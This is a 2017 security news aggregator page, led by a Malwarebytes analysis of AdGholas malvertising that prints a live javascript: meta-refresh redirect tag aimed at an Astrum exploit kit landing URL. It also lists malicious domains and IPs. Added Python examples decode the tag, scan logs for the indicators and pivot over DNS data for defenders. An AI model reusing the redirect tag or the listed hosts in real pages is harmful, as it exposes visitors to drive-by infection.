A former Google executive, Abousselham brings nearly 20 years of experience leading security teams to Okta. Most recently, he was the CISO for SoFi, where he built the company's information security and privacy program. Abousselham will report directly to Okta's CEO, Todd McKinnon.

To read this article in full or to leave a comment, please click here

News in brief: cryptocurrency exchange hacked; laptop ban further eased; AA under fire over data breach

July 05, 2017 05:56 PM - Naked Security - Your daily round-up of some of the other stories in the news

Dubai Deploying Autonomous Robotic Police Cars

July 05, 2017 05:48 PM - Schneier on Security -

It's hard to tell how much of this story is real and how much is aspirational, but it really is only a matter of time:

About the size of a child's electric toy car, the driverless vehicles will patrol different areas of the city to boost security and hunt for unusual activity, all the while scanning crowds for potential persons of interest to police and known criminals.

Libgcrypt ‘Sliding Right’ Attack Allows Recovery of RSA-1024 Keys

July 05, 2017 05:48 PM - Threatpost - GnuPG recently patched cryptographic library Libgcrypt, preventing a local side-channel attack; something that could have allowed full key recovery for RSA-1024.

A Blue Team's reference guide to dealing with Ransomware

July 05, 2017 05:46 PM - Salted Hash -

Ransomware has been around since 2013, but it was the success of CryptoLocker that spawned a booming vertical market for criminals. Last week, as June came to a close, criminals leveraged the fear associated with the Petya Ransomware family to create chaos across the globe.

Last week's attack, dubbed NotPetya, masqueraded as a Ransomware attack, but that wasn't the real goal. While the funds collected by the criminals have been retrieved, experts have determined that chaos was the ultimate goal.

To read this article in full or to leave a comment, please click here


39% off Exploring Raspberry Pi: Interfacing to the Real World with Embedded Linux, Paperback - Deal Alert

July 05, 2017 05:39 PM - CSO Online -

The Raspberry Pi's most famous feature is its adaptability. It can be used for thousands of electronic applications (See: "How to build a Raspberry Pi retrogaming emulation console"). This book, Exploring Raspberry Pi, is the innovators guide to bringing Raspberry Pi to life. The book favors engineering principles over a 'recipe' approach to give you the skills you need to design and build your own projects. You'll understand the fundamental principles in a way that transfers to any type of electronics, electronic modules, or external peripherals, using a "learning by doing" approach that caters to both beginners and experts. The book begins with basic Linux and programming skills, and helps you stock your inventory with common parts and supplies. Next, you'll learn how to make parts work together to achieve the goals of your project, no matter what type of components you use. The companion website provides a full repository that structures all of the code and scripts, along with links to video tutorials and supplementary content that takes you deeper into your project. The list price has been reduced 39% on Amazon, from $35 to $21.40. See this deal now on Amazon. A complete Raspberry Pi starter kit can be purchased here for $89.99

To read this article in full or to leave a comment, please click here

'Crackas With Attitude' Hacker Sentenced for Targeting Government Officials

July 05, 2017 05:00 PM - Dark Reading - A North Carolina man known as 'Incursio' goes to prison for hacking government systems as well as senior government officials.

Hackers Connected to NotPetya Ransomware Surface Online, Empty Bitcoin Wallet

July 05, 2017 04:41 PM - Office of Inadequate Security - Lorenzo Franceschi-Bicchierai reports: Hackers connected to the disruptive world-wide ransomware attack that crippled Ukraine and hit computers all over the world have surfaced online. Bitcoin sent to the hackers by victims has been moved from an online wallet, and someone seemingly connected to the group is now asking for more money. On June 28, unknown [...]

Illinois poised to ban geolocation tracking without consent

July 05, 2017 04:31 PM - Naked Security - Great news, right? But is it a waste of time, or a welcome step towards greater privacy?

Researchers Build Firewall to Deflect SS7 Attacks

July 05, 2017 04:20 PM - Dark Reading - Security researchers will release an open-source SS7 firewall at Black Hat USA that aims to bolster security of mobile operators' core networks.

June 2017: The Month in Ransomware

July 05, 2017 04:17 PM - TripWire - The State of Security -

When it seemed that ransomware authors hit the lowest of the low with their attacks a long time ago, they managed to take it a notch further last month. With the revamped Petya Trojan that surfaced on June 27, the crooks broke new ground and started waging a real cyber war against a particular country. […]… Read More

The post June 2017: The Month in Ransomware appeared first on The State of Security.

AdGholas malvertising thrives in the shadows of ransomware outbreaks

July 05, 2017 04:05 PM - Malwarebytes Unpacked -

The latest wave of ransomware following the WannaCry outbreak has kept everyone very busy and has been the topic of many conversations. In the meantime, other threat actors have been quite active and perhaps even enjoyed this welcome diversion. This is certainly true for the most prolific malvertising gang of the moment, dubbed AdGholas.

Exposed a few times this year by ProofPoint and TrendMicro, AdGholas is playing a whack-a-mole game with the ad industry to distribute malware onto unsuspecting users with the help of the Astrum exploit kit.

A master of disguise, AdGholas has been flying right under the nose of several top ad networks while benefiting from the ‘first to move’ effect. Indeed, the malvertising operators are able to quickly roll out and activate a fake advertising infrastructure for a few days before getting banned.

On June 28 (about ten days after it was last publicly reported), we started seeing a new wave of drive-by download attacks distributed globally pushing the Astrum exploit kit. Sure enough, it was associated with AdGholas activity via a decoy website. Behind the fake ad banners for ‘expert essays’, designed to trick ad agencies, lay code to exploit and infect users who simply happened to visit popular websites.

The fraudulent website expert-essays[.]com, which was registered June 22, is using a certificate from Let’s Encrypt, and is a replica of essayoneday.com. There are only a few minor visual differences between the two, and a cursory review would reveal the copycat. However, that is easier said than done in an industry dominated by automation and volume.

After getting caught, AdGholas came back up again on July 1st and 2nd – perhaps a long holiday week-end in the US may have seemed like the right timing – via a new decoy site, jet-travels[.]com, with the same modus operandi:

From AdGholas to Astrum EK

We collected artifacts that show us the redirection between the AdGholas group and the Astrum exploit kit. This kind of redirect is highly conditional in order to evade the majority of ad scanners. While many malvertising actors do not care about cloaking, it is very important to others such as AdGholas because stealthiness is a strength that contributes to its longevity.

The redirect tag hosted on expert-essays[.]com loads a landing page for the Astrum exploit kit with:

["javascript:%27<meta http-equiv=refresh content=\"0;url=","\">%27","https:\/\/comm.clamotten.com\/7pkzi\/-fb2j5s48sv4b\/nlo17hdt0cexguqnir\/kqh-xya-c6do32smjwh9mnc0","ae0a5bca85a8f0e1"]
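The tag above is a JSON array whose pieces, once stitched together, form a javascript: URL that evaluates to a meta-refresh element pointing at the Astrum landing page. The following Python is an added example (not code from the Malwarebytes post) that reassembles such a tag and pulls out the landing URL, plus the cheap pre-render checks an ad scanner could apply. The assembly order (head, target, tail, opaque id) is an assumption inferred from the fragment, not something the post states; the benign tag is constructed for contrast.

```python
import json
import re
from urllib.parse import unquote

# The redirect tag recovered from expert-essays[.]com, as printed in the post,
# with its smart quotes normalised back to plain JSON quoting.
REDIRECT_TAG = (
    r'["javascript:%27<meta http-equiv=refresh content=\"0;url=",'
    r'"\">%27",'
    r'"https:\/\/comm.clamotten.com\/7pkzi\/-fb2j5s48sv4b\/nlo17hdt0cexguqnir\/kqh-xya-c6do32smjwh9mnc0",'
    r'"ae0a5bca85a8f0e1"]'
)

# A constructed, benign creative of the same shape, for contrast.
BENIGN_TAG = r'["<img src=\"https://cdn.example/banner.png\">", "", "", "0123456789abcdef"]'

META_REFRESH = re.compile(r'content=["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)', re.IGNORECASE)


def assemble_javascript_url(parts):
    """Stitch the fragments into the javascript: URL the ad frame would execute.

    Assumption (not stated in the post): element 0 is the head, element 1 the
    tail, element 2 the landing URL and element 3 an opaque campaign id.
    The %27 quotes are percent-encoded so the creative never contains a literal
    quoted javascript: payload that a naive scanner would match.
    """
    head, tail, target = parts[0], parts[1], parts[2]
    return unquote(head) + target + unquote(tail)


def extract_landing_url(tag_json):
    """Return the exploit-kit landing URL hidden in a redirect tag, or None."""
    parts = json.loads(tag_json)
    if len(parts) < 3:
        return None
    js_url = assemble_javascript_url(parts)
    if not js_url.lower().startswith("javascript:"):
        return None
    match = META_REFRESH.search(js_url)
    return match.group(1) if match else None


def landing_host(tag_json):
    """Hostname of the landing URL, handy for an IOC lookup."""
    url = extract_landing_url(tag_json)
    if url is None:
        return None
    return re.sub(r"^https?://", "", url).split("/", 1)[0].lower()


def tag_reasons(tag_json):
    """Pre-flight checks an ad scanner can apply before rendering a creative."""
    reasons = []
    raw = tag_json.lower()
    if "javascript:" in raw:
        reasons.append("javascript: scheme in creative")
    if "http-equiv=refresh" in raw:
        reasons.append("meta refresh in creative")
    if "%27" in raw or "%22" in raw:
        reasons.append("percent-encoded quotes (quote splitting)")
    if extract_landing_url(tag_json):
        reasons.append("assembled javascript: URL refreshes to an external origin")
    return reasons


if __name__ == "__main__":
    print(extract_landing_url(REDIRECT_TAG))
    print(tag_reasons(REDIRECT_TAG))
```

Note that the string checks alone would miss a tag that splits the keyword itself across array elements; the assembly step is what catches the general case, which is why a scanner should evaluate the creative the way the browser will rather than grep the raw markup.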

The group behind Astrum EK is also very sneaky, making good use of SSL, domain shadowing and other server-side tricks that make traffic collection and replay a challenge. In the current exploit kit landscape, domain shadowing has slowed down, and the popular RIG EK mostly resorts (with a few exceptions) to IP addresses in lieu of shadowed domains. Plain HTTP is the norm for serving content, which sets Astrum EK apart from the rest.

For a long time banking Trojans were the payload of choice for Astrum EK, which fit the elusive, low-key nature of the exploit kit. However, according to Proofpoint, new AdGholas/Astrum infection chains have recently been dropping ransomware. Although it is a change of style for these threat actors, cashing in on the ransomware frenzy makes sense.

Containment and protection

Malvertising continues to affect users on a large scale and remains a reliable infection vector for threat actors. The recent, renewed activity from sophisticated groups like AdGholas is something to watch for in a drive-by landscape now dominated by malvertising-borne attacks rather than compromised sites.

Ad blockers are one of several layers end users can rely on, but it is worth noting that even ad blockers can be bypassed, and they do not fix the most common underlying issue, which is outdated software. In other words, patching machines regularly immediately raises the difficulty for an attacker trying to compromise your system. However, since threat actors like AdGholas and Astrum EK are advanced and have employed zero-days, it is also important to use signature-less, proactive defenses to handle those cases.

We’re happy to report that Malwarebytes users were protected against these malvertising campaigns already.

Indicators of compromise (IOCs)

AdGholas:

expert-essays[.]com
jet-travels[.]com
5.34.180.73
162.255.119.165

Astrum Exploit Kit:

uniy[.]clamotten[.]com
comm[.]clamotten[.]com
comp[.]computer-tutor[.]info
lexy[.]computer-tutor[.]info
sior[.]ccnacertification[.]info
kvely[.]our-health[.]us
nuent[.]mughalplastic[.]com
mtive[.]linksaffpixel[.]com
cons[.]pathpixel[.]com
sumer[.]pathlinkaff[.]com
nsruc[.]ah7xb[.]com
ction[.]ah7xb[.]com
nstru[.]onlytechtalks[.]com
const[.]linksaffpixel[.]com
quely[.]onlytechtalks[.]com
coneq[.]modweave[.]com
94.156.174.11
SWF: 4ad7556a7ef85be260a8c10cfbc855234f0e9b8880db2be17ad0ad1d6e52909e
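As a practical use of the IOC list above, here is an added Python example (not from the Malwarebytes post) that sweeps a web proxy log for the listed hosts and IPs. Because Astrum relies on domain shadowing, it also flags unlisted subdomains under the same parent domains, while skipping the apex and www host where the legitimate owner's site normally lives. The log format and the sample lines are constructed for the example; adapt the regex to your proxy.

```python
import re
from collections import namedtuple

# Indicators as listed in the post.
ADGHOLAS_HOSTS = {"expert-essays.com", "jet-travels.com"}
ASTRUM_HOSTS = {
    "uniy.clamotten.com", "comm.clamotten.com",
    "comp.computer-tutor.info", "lexy.computer-tutor.info",
    "sior.ccnacertification.info", "kvely.our-health.us",
    "nuent.mughalplastic.com", "mtive.linksaffpixel.com",
    "cons.pathpixel.com", "sumer.pathlinkaff.com",
    "nsruc.ah7xb.com", "ction.ah7xb.com",
    "nstru.onlytechtalks.com", "const.linksaffpixel.com",
    "quely.onlytechtalks.com", "coneq.modweave.com",
}
IOC_IPS = {"5.34.180.73", "162.255.119.165", "94.156.174.11"}


def parent_domain(host):
    """Registrable parent taken as the last two labels. Fine for these IOCs;
    production code should consult the public suffix list (think 'co.uk')."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


# Astrum hosts are throwaway subdomains of legitimate domains (domain shadowing),
# so a fresh, unlisted subdomain under the same parent deserves a look even
# though the parent domain itself is not malicious.
SHADOWED_PARENTS = {parent_domain(h) for h in ASTRUM_HOSTS}

Hit = namedtuple("Hit", "line_no host reason")

# Assumed proxy log format: timestamp client dst_ip host url status
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<dst_ip>\S+) (?P<host>\S+) (?P<url>\S+) (?P<status>\d+)$"
)

# Constructed sample lines (the 203.0.113.x / 93.184.216.34 rows are benign or unlisted).
SAMPLE_LOG = """\
2017-07-01T10:22:13Z 10.1.2.3 5.34.180.73 expert-essays.com https://expert-essays.com/ 200
2017-07-01T10:22:14Z 10.1.2.3 94.156.174.11 comm.clamotten.com https://comm.clamotten.com/7pkzi/-fb2j5s48sv4b/ 200
2017-07-01T10:22:15Z 10.1.2.3 203.0.113.9 zzvq.clamotten.com https://zzvq.clamotten.com/a1/ 200
2017-07-01T10:23:00Z 10.1.2.4 93.184.216.34 www.example.com http://www.example.com/ 200
2017-07-01T10:23:01Z 10.1.2.4 203.0.113.9 www.clamotten.com https://www.clamotten.com/ 200
"""


def scan(log_text):
    """Return one Hit per matching reason; a single line can yield several."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the sweep
        host = m["host"].lower().rstrip(".")
        parent = parent_domain(host)
        if host in ADGHOLAS_HOSTS:
            hits.append(Hit(n, host, "adgholas-decoy-host"))
        elif host in ASTRUM_HOSTS:
            hits.append(Hit(n, host, "astrum-landing-host"))
        elif parent in SHADOWED_PARENTS and host not in {parent, "www." + parent}:
            hits.append(Hit(n, host, "unlisted-subdomain-of-shadowed-parent"))
        if m["dst_ip"] in IOC_IPS:
            hits.append(Hit(n, host, "ioc-ip"))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The shadowed-parent rule is deliberately a lead, not a verdict: the owners of those domains are victims of credential theft, and blocking the whole parent would break their legitimate sites.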

The post AdGholas malvertising thrives in the shadows of ransomware outbreaks appeared first on Malwarebytes Labs.

Ukrainian police seize computers that spread global NotPetya attack

July 05, 2017 04:03 PM - CSO Online -

Ukraine's Cyber Police have intervened to prevent further cyberattacks in the wake of last week's global attack, initially considered to be ransomware and called by various names including NotPetya.

The attack affected businesses around the world, but Ukraine was hit particularly hard because, security researchers believe, the initial attacks were disguised in an automatic update to the MEDoc tax and accounting software widely used in the country.

A backdoor could have been introduced into M.E.Doc as early as May 15, the police said, after one of the developer's computers was taken over.

Police said Wednesday that they had seized computers and software from M.E.Doc's developer after spotting fresh signs of malicious activity, and have taken the items away for analysis. They hope this will put an end to further uncontrolled distribution of the NotPetya malware (also referred to as Diskcoder.c, ExPetr, PetrWrap and Petya) used in the previous attack, they said.

Threat Analyst Using RiskIQ PassiveTotal: A Day in the Life

July 05, 2017 04:00 PM - RiskIQ -

John is a tier-two threat analyst on a five-person SOC team at a public sector organization. He uses RiskIQ PassiveTotal daily to investigate indicators of compromise (IOCs) during incident response with minimal false positives.

The team leverages the relationships between the highly connected data collected by RiskIQ inside the RiskIQ PassiveTotal platform, pivoting on its unique data sets to surface new connections, group similar attack activity, and substantiate assumptions for each IOC.

However, John’s team did not always use RiskIQ PassiveTotal.

Once upon a time, they used a manual, highly segmented workflow composed of a cocktail of different tools. According to John, below is what a typical incident response might have looked like for him in the pre-PassiveTotal days. We will use an IP from a recent event in which the Lazarus Group attacked Polish banks as the example.

The IP 109[.]164[.]247[.]169 is flagged through IDS.

1. John logs into DomainTools for an IP WHOIS lookup, which provides WHOIS information such as the resolving host, WHOIS history, contact emails, and more:

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-1 WHOIS info inside DomainTools

2. In a separate tab, he opens Mnemonic for a passive DNS lookup, which pulls in domains resolving to the suspect IP:

Fig-2 DNS lookup inside Mnemonic

3. To see if there is any open source intelligence on the IP, he opens several more tabs to search multiple sources, such as PhishTank, the FireEye blog, Facebook ThreatExchange, and more:

Fig-3 Various OSINT tools

4. Next, he opens a new tab to check the domains he found in Mnemonic against hashes in VirusTotal:

Fig-4 Hashes inside VirusTotal

Through these steps, John gathers a good deal of knowledge about this IP: WHOIS information, passive DNS, OSINT, and hashes. If the initial research uncovers something interesting, he can spend more time diving deeper into that area. Investigations done this way can easily take 10-15 minutes each, spread across up to six different sources.

Now, let’s take a look at what the same investigation looks like today, now that John and his team use RiskIQ PassiveTotal.

The IP 109[.]164[.]247[.]169 is flagged through IDS.

1. John takes the flagged IP and queries it inside the RiskIQ PassiveTotal platform. Immediately, the WHOIS and passive DNS data are presented in a visual heat map.

2. Using the heat map, John can pinpoint and narrow down his investigation based on unique changes. All historical IP/domain resolutions are displayed under the ‘resolutions’ tab, letting John review every historical resolution in a single view:

Fig-5 Querying the IP combines all six sources in the old method into one

3. John pivots from the domain under the ‘resolutions’ tab, which automatically will run a query on ‘sap[.]misapor[.]ch’:

Fig-6 Querying DNS data in RiskIQ PassiveTotal

The RiskIQ PassiveTotal interface displays detailed contextual information such as OSINT, RiskIQ’s proprietary blacklist, malware, and more, allowing John to stay inside the platform to take his investigation further. The entire process is seamless and takes only a few minutes without ever leaving the platform.

Fig-7 Data shows that threat analysts who use RiskIQ PassiveTotal save time

As seen above, by using RiskIQ PassiveTotal the time spent on this investigation was cut by more than half. On top of time savings, RiskIQ PassiveTotal aggregates data into one single view, so threat analysts like John no longer need to visit or subscribe to multiple sources.

Fig-8 Data shows that threat analysts enjoy RiskIQ PassiveTotal’s comprehensive data

In addition to the datasets presented above, RiskIQ PassiveTotal has many unique datasets derived from data captured during our virtual user crawling sessions. For example, the Host Pairs dataset is generated when RiskIQ crawling infrastructure identifies references or redirections on a page to other websites. Host Pairs played a major role in the investigation of the Polish bank hack: it showed that the malicious domain (sap[.]misapor[.]ch) was linked to a legitimate Polish bank via an iframe, confirming that the attack originated from external sources.

Below, you can see that RiskIQ crawlers observed the KNF website pointing to two malicious URLs via an iframe:

[http]://sap.misapor.ch/vishop/view.jsp?pagenum=1
And [https]://www.eye-watch.in/design/fancybox/Pnf.action

Fig-9 The unique Host Pairs data set shows iframes pointing to external sources
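The pivots in John's investigation (IP to resolving domains, domain to historical resolutions, child host to the pages that embed it) are graph walks over passive DNS and host-pair data. The Python below is an added example, not RiskIQ code or its API, that performs those pivots over a small in-memory dataset. The seed IP, sap.misapor.ch and www.eye-watch.in come from the post; every other host and address is a constructed placeholder (.example names and RFC 5737 ranges), and www.knf.example stands in for the KNF site the post describes.

```python
from collections import deque

# Constructed passive-DNS records: (hostname, ip, first_seen, last_seen).
PDNS = [
    ("sap.misapor.ch",        "109.164.247.169", "2016-10-07", "2017-02-03"),
    ("sap.misapor.ch",        "203.0.113.17",    "2016-03-02", "2016-10-06"),
    ("static.cdn-ad.example", "109.164.247.169", "2015-06-11", "2017-02-03"),
    ("www.eye-watch.in",      "198.51.100.45",   "2016-11-20", "2017-02-03"),
    ("intranet.corp.example", "192.0.2.10",      "2014-01-01", "2017-07-05"),
]

# Constructed host-pair observations: (parent page host, child host, cause).
HOST_PAIRS = [
    ("www.knf.example",        "sap.misapor.ch",        "iframe"),
    ("www.knf.example",        "www.eye-watch.in",      "iframe"),
    ("www.knf.example",        "static.cdn-ad.example", "script"),
    ("www.other-bank.example", "static.cdn-ad.example", "script"),
]


def resolutions(host):
    """Historical resolutions of a host, oldest first (the 'resolutions' view).
    A change of IP right before the incident window is the kind of 'unique
    change' an analyst looks for in the heat map."""
    return sorted((first, last, ip) for h, ip, first, last in PDNS if h == host)


def domains_on(ip):
    """Domains that have resolved to an IP (the passive DNS pivot)."""
    return sorted({h for h, i, _, _ in PDNS if i == ip})


def embedding_pages(child):
    """Pages observed embedding a host via iframe/script (the Host Pairs pivot)."""
    return sorted({p for p, c, _ in HOST_PAIRS if c == child})


def build_graph():
    """Undirected graph: host <-> IP edges from pDNS, page <-> child edges from host pairs."""
    edges = {}

    def add(a, b, label):
        edges.setdefault(a, set()).add((b, label))
        edges.setdefault(b, set()).add((a, label))

    for host, ip, first, last in PDNS:
        add(host, ip, f"resolves {first}..{last}")
    for parent, child, cause in HOST_PAIRS:
        add(parent, child, f"host-pair:{cause}")
    return edges


def pivot(seed, max_hops=2):
    """Breadth-first walk from a seed IP or host; returns {node: hops_from_seed}.
    max_hops bounds the blast radius, since pivoting through a shared hosting IP
    quickly drags unrelated infrastructure into the cluster."""
    edges = build_graph()
    seen = {seed: 0}
    queue = deque([seed])
    while queue:
        node = queue.popleft()
        if seen[node] >= max_hops:
            continue
        for neighbour, _ in edges.get(node, ()):
            if neighbour not in seen:
                seen[neighbour] = seen[node] + 1
                queue.append(neighbour)
    return seen


if __name__ == "__main__":
    seed_ip = "109.164.247.169"  # the IP flagged by IDS in the post
    print("domains on seed:", domains_on(seed_ip))
    print("sap.misapor.ch history:", resolutions("sap.misapor.ch"))
    print("pages embedding sap.misapor.ch:", embedding_pages("sap.misapor.ch"))
    for node, hops in sorted(pivot(seed_ip).items(), key=lambda kv: kv[1]):
        print(hops, node)
```

With the default two hops the walk reaches the embedding page but not its other children; raising max_hops to three brings in www.eye-watch.in through the page, which is exactly the kind of second-order link worth confirming by hand before acting on it.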

About RiskIQ PassiveTotal for Threat Analysts

RiskIQ PassiveTotal’s ever-expanding data provides new context to adversaries’ infrastructure and now includes deeper monitoring capabilities. Security teams can be alerted in real-time to changes in DNS and domain resolution, WHOIS registration, and the appearance of other new keywords of interest. The latest release also includes a project workflow to quickly organize and group related threat infrastructure components found during investigations. This allows threat analysts and research teams to be more efficient and agile in their investigations. To try it for yourself, sign up for RiskIQ Community Today.

The post Threat Analyst Using RiskIQ PassiveTotal: A Day in the Life appeared first on RiskIQ.

Photobucket replaces millions of images with 'ransom demand'

July 05, 2017 03:21 PM - CSO Online -

If you’ve been shopping online over the last week or so, you may have run across listings that do not include an image of the product but do include a Photobucket error message image. That’s because the company quietly did away with free image embedding on third-party websites. It’s a move that is being compared to Photobucket holding its users’ photos for ransom.

Over the last 14 years, Photobucket claims to have hosted over 15 billion images for 100 million registered users, serving up more than “120 billion photos and videos to over three million websites.” The difference in the number of the photos served as opposed to hosted is because a user may embed the same image on multiple shopping sites, such as eBay, Amazon and Etsy, as well as on forums and other sites. By doing away with free hotlinking, Photobucket has effectively broken billions of images on the internet.

EFF, Access Now, CDT, and OTI Fight Back Against “Secret” Search Warrants

July 05, 2017 03:00 PM - EFF Deeplinks -

Can the government stop you from finding out it’s been looking through your private Facebook content as part of a “secret” investigation that’s not actually secret? That’s the question raised by an alarming case pending in the Washington D.C. Court of Appeals. Facebook has described the investigation as "known to the public," and the timing and venue match the January 20th, 2017 Presidential Inauguration protests (known as “J20”), the investigation of which is indeed quite public. But even if the warrants pertain to another investigation, the government should not be allowed to impose gag orders with respect to any information that is already publicly known.

Last week, EFF led a group of civil society organizations that included Access Now, the Center for Democracy and Technology, and New America’s Open Technology Institute in filing a brief demanding that the court apply a stringent constitutional test before enforcing gag orders accompanying a number of secret search warrants. We argued that the First Amendment rarely if ever allows gag orders in such cases, where the government seeks to limit public scrutiny of high-profile and potentially politicized investigations. 

Here’s what we know: Facebook is fighting gags associated with several search warrants for user content. The company thinks this case is so important that it sent out a kind of bat signal to groups like EFF. Although the case is under seal, Facebook petitioned the D.C. Court of Appeals (the District’s highest court) to open the proceeding up to amicus briefs and to reveal that Facebook argues that “neither the government’s investigation nor its interest in Facebook user information” is a secret.

Although we can’t be sure, we have a hunch the search warrants are related to the J20 protests. On January 20, the day of President Trump’s inauguration, police in D.C. arrested hundreds of protesters, charging many with felony rioting. Over the last several months, the press has reported on the controversial and wide-ranging investigation into the protests, which apparently included police infiltration of planning meetings. Additionally, in late January, some defendants received notice from Facebook that their non-content account information had been subpoenaed by law enforcement. Their attorneys sought to quash those subpoenas, and we believe the timeline in this case suggests the government sought to get even more private information, including account content, using warrants to Facebook accompanied by gag orders.

Whether or not this case involves the J20 protests, the fact that Facebook says the underlying investigation is already public is almost certainly enough to strike down the gag orders. Government gags that prevent a provider from notifying its users are an example of prior restraints, which are the “most serious” and “least tolerable” infringement on First Amendment rights. As a result, the Supreme Court has said they are only constitutional if they survive the “most exacting scrutiny.”

But despite the strong presumption against prior restraints, the government gets gag orders all the time. Two of the most commonly used gag authorities are National Security Letters, which EFF continues to challenge on appeal in the Ninth Circuit, and nondisclosure orders issued under the Stored Communications Act, 18 U.S.C. § 2705, at issue in this case.

There are strong arguments that Section 2705 nondisclosure orders are unconstitutional all or nearly all of the time. In just the last several months, Microsoft has sued to have Section 2705 declared unconstitutional on its face, while Adobe succeeded in convincing a court to strike down an indefinite Section 2705 gag.

But the apparently public nature of the investigation here makes the gags even more egregious. In order to uphold a prior restraint, a court must be satisfied that it is necessary to protect against “a clear and present danger or a serious and imminent threat” to an important government interest. As we point out in our brief, if the government’s investigation into the Facebook accounts is already known, there is no way a gag can prevent any harm flowing from notifying the users and allowing them to challenge the search warrants. We point to two cases in which the Supreme Court struck down gags that prevented the press from reporting sensitive information that had already been revealed in open court.

Although the docket is sealed, it’s our understanding that the court has set this case for oral argument in September 2017. We have requested an opportunity to address the court to represent the public’s interest in ensuring that prior restraints such as this don’t issue without the most exacting scrutiny our court system is prepared to provide. We will keep you informed of any updates we receive.

School board addresses second privacy breach at Collingwood Collegiate

July 05, 2017 02:56 PM - Office of Inadequate Security - Ian Adams reports: The Simcoe County District School Board has sent out another notice to parents of a potential privacy breach at Collingwood Collegiate Institute. On June 30, officials advised parents of a potential breach associated with a list of email addresses and phone numbers. Area 5 superintendent of education Jackie Kavanagh sent a letter [...]

Ukrainian cyberpolice seized MeDoc servers while hackers withdrew Bitcoin from NotPetya wallet

July 05, 2017 02:42 PM - Security Affairs -

Ukraine’s cyber police seized the MeDoc servers after detecting new suspicious activity and fearing fresh malware-based attacks.

The Ukrainian authorities have seized equipment from the accounting software firm MeDoc, which is suspected of having played a significant role in the recent NotPetya attack.

Ukraine’s cyber police seized the servers after detecting new suspicious activity; the seizure is a containment measure adopted to “immediately stop the uncontrolled proliferation” of malware.

NotPetya medoc company

According to the Associated Press’s Raphael Satter, who quotes Cyberpolice spokesperson Yulia Kvitko, the company’s systems had either sent or were ready to send out a new update that might have been compromised by hackers.

“Tax software firm M.E. Doc was raided to “immediately stop the uncontrolled proliferation” of malware. In a series of messages, Cyberpolice spokeswoman Yulia Kvitko suggested that M.E. Doc had sent or was preparing to send a new update and added that swift action had prevented any further damage.” states the AP. “Our experts stopped (it) on time,” she said.

MeDoc technical staff handed over the equipment to the Ukraine Cyberpolice for detailed analysis. While the Cyberpolice investigate the case, the authorities urge people to stop using the MeDoc application. The experts suggest turning off any computers running the MeDoc software, changing their login credentials and obtaining new digital signatures.

Back to the massive NotPetya attack: Kaspersky Lab analyst Aleks Gostev confirmed that the alleged attackers cashed out the sum paid by the victims; the Bitcoin collected in the original attack has been withdrawn.

Roughly 3.96 Bitcoin ($10,382) was withdrawn from a wallet linked to NotPetya attack early on Wednesday morning.

Hackers used the money to pay for a Pastebin Pro account on the dark web, which was then used to post fresh ransomware drop instructions.

The AP closed its post by reporting that Infrastructure Minister Volodymyr Omelyan told it his department had incurred “millions” in costs, with hundreds of workstations and two of its six servers knocked out.

Pierluigi Paganini 

(Security Affairs – MeDoc, NotPetya)

The post Ukrainian cyberpolice seized MeDoc servers while hackers withdrew Bitcoin from NotPetya wallet appeared first on Security Affairs.

Bad things happen to good people – but you can help stop that

July 05, 2017 02:34 PM - Naked Security - Who gets targeted by scammers, and how can we help them? We've got some tips to help you help others

Avoiding the Dark Side of AI-Driven Security Awareness

July 05, 2017 02:30 PM - Dark Reading - Can artificial intelligence bring an end to countless hours of boring, largely ineffective user training? Or will it lead to a surveillance state within our information infrastructures?

Last updated (UTC):
July 07, 2017 12:18 AM
